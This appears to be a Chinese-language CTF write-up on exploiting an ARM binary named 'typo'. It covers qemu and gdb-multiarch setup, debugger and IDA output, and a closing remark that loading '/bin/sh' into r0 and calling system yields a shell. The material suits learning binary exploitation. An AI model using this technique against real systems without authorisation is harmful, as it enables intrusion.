arm架构利用

arm架构漏洞利用

环境搭建

1
2
3
sudo apt-get install gdb-multiarch
qemu安装
apt search "libc6" | grep ARCH

typo题

静态连接符号表恢复,参见静态表恢复文章

qemu打开程序

1
2
3
4
qemu-arm -g 1234  ./typo
这道题是静态连接所以不需要-L,但是动态连接的程序需要这样 -L /usr/mipsel-linux-gnu/
gdb-multiarch ./typo -q
target remote localhost:1234
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
 ► 0x8b98    mov    fp, #0
   0x8b9c    mov    lr, #0
   0x8ba0    pop    {r1}
   0x8ba4    mov    r2, sp
   0x8ba8    str    r2, [sp, #-4]!
   0x8bac    str    r0, [sp, #-4]!
   0x8bb0    ldr    ip, [pc, #0x10]
   0x8bb4    str    ip, [sp, #-4]!
   0x8bb8    ldr    r0, [pc, #0xc]
   0x8bbc    ldr    r3, [pc, #0xc]
   0x8bc0    bl     #0x9ebc
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ sp  0xf6fff1a0 ◂— 0x1
01:0004│     0xf6fff1a4 —▸ 0xf6fff334 ◂— './typo'
02:0008│     0xf6fff1a8 ◂— 0x0
03:000c│     0xf6fff1ac —▸ 0xf6fff33b ◂— 0x752f3d5f ('_=/u')
04:0010│     0xf6fff1b0 —▸ 0xf6fff34f ◂— 0x54554158 ('XAUT')
05:0014│     0xf6fff1b4 —▸ 0xf6fff372 ◂— 0x5353454c ('LESS')
06:0018│     0xf6fff1b8 —▸ 0xf6fff394 ◂— 0x5f4b5447 ('GTK_')
07:001c│     0xf6fff1bc —▸ 0xf6fff3a7 ◂— 0x5f474458 ('XDG_')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0     8b98
1
2
3
4
5
6
7
8
9
10
11
12

.text:00008B9C                 MOV     LR, #0
.text:00008BA0                 LDR     R1, [SP+arg_0],#4
.text:00008BA4                 MOV     R2, SP
.text:00008BA8                 STR     R2, [SP,#-4+arg_0]!
.text:00008BAC                 STR     R0, [SP,#var_4]!
.text:00008BB0                 LDR     R12, =__libc_thread_freeres
.text:00008BB4                 STR     R12, [SP,#4+var_8]!
.text:00008BB8                 LDR     R0, =sub_8F00//这个函数是main
.text:00008BBC                 LDR     R3, =sub_A5EC
.text:00008BC0                 BL      sub_9EBC
.text:00008BC4                 BL      sub_F0E0

arm架构按r0,r1的顺序使用寄存器,所以让r0为/bin/sh再调用system就好了